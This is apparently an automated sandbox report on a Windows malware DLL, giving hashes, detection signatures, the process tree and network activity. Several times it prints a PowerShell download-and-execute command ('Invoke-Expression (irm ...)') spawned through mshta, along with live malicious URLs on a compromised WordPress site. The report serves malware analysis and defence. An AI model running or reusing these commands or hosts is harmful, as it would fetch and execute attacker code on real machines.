Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UPazTgVGA7.dll

Overview

General Information

Sample name:UPazTgVGA7.dll
(renamed file extension from exe to dll, renamed because original name is a hash value)
Original sample name:e3493cc788d91b70277729ea748cce0d.exe
Analysis ID:1445895
MD5:e3493cc788d91b70277729ea748cce0d
SHA1:f1246730dafb3bf93f98d5b08baa5315626fb28a
SHA256:08a15e5718a53a317604d19b4ea49f1844d7a53af353808e7bfb9dc81cfe2342
Tags:64exe
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Windows Binaries Write Suspicious Extensions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 2640 cmdline: loaddll64.exe "C:\Users\user\Desktop\UPazTgVGA7.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5888 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 2668 cmdline: rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • WerFault.exe (PID: 4304 cmdline: C:\Windows\system32\WerFault.exe -u -p 2668 -s 424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 3504 cmdline: rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,hash MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 2968 cmdline: C:\Windows\system32\WerFault.exe -u -p 3504 -s 244 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 4280 cmdline: rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,xlAutoOpen MD5: EF3179D498793BF4234F708D3BE28633)
      • mshta.exe (PID: 7120 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 7200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7376 cmdline: rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",hash MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7456 cmdline: C:\Windows\system32\WerFault.exe -u -p 7376 -s 424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7384 cmdline: rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",xlAutoOpen MD5: EF3179D498793BF4234F708D3BE28633)
      • mshta.exe (PID: 7536 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,xlAutoOpen, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 4280, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, ProcessId: 7120, ProcessName: mshta.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7120, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), ProcessId: 7200, ProcessName: powershell.exe
Sigma detected: Windows Binaries Write Suspicious Extensions
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\rundll32.exe, ProcessId: 4280, TargetFilename: c:\users\public\example.hta
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7120, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), ProcessId: 7200, ProcessName: powershell.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtfAvira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt?M;(Avira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen72be476187889df5a41b67e836Avira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtgAvira URL Cloud: Label: malware
Source: http://iapartmentlistings.com/tykhwuxkAvira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtLMEMAvira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtAvira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txthAvira URL Cloud: Label: malware
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 83.2% probability
Machine Learning detection for sample
Source: UPazTgVGA7.dllJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 194.124.213.167:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: UPazTgVGA7.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 194.124.213.167 443Jump to behavior
Source: Joe Sandbox ViewASN Name: SOLNETCH SOLNETCH
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-automatic/d.txt HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.siguefutbol.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-automatic/d.txt HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.siguefutbol.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: www.siguefutbol.com
Source: global trafficDNS traffic detected: DNS query: iapartmentlistings.com
Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/f=
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A894000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2040242561.000002AC3A7C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2040242561.000002AC3A7CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt?M;(
Source: rundll32.exe, 00000012.00000002.2067605540.000001B9DE938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtLMEM
Source: rundll32.exe, 00000012.00000002.2067605540.000001B9DE880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtf
Source: rundll32.exe, 00000012.00000002.2067605540.000001B9DE888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtg
Source: rundll32.exe, 00000012.00000002.2067605540.000001B9DE880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txth
Source: rundll32.exe, 00000003.00000002.2194404409.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2207076977.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2180195670.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, UPazTgVGA7.dllString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen72be476187889df5a41b67e836
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 194.124.213.167:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2668 -s 424
Source: UPazTgVGA7.dllStatic PE information: Number of sections : 11 > 10
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engineClassification label: mal76.evad.winDLL@27/21@2/2
Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\d[1].txtJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7376
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3504
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2668
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\187fc8ed-96b8-4b8b-8b6b-8a8d645903b0Jump to behavior
Source: UPazTgVGA7.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\rundll32.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,hash
Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\UPazTgVGA7.dll"
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,hash
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2668 -s 424
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3504 -s 244
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,xlAutoOpen
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",hash
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",xlAutoOpen
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7376 -s 424
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,hashJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,xlAutoOpenJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",hashJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",xlAutoOpenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshtaJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshtaJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
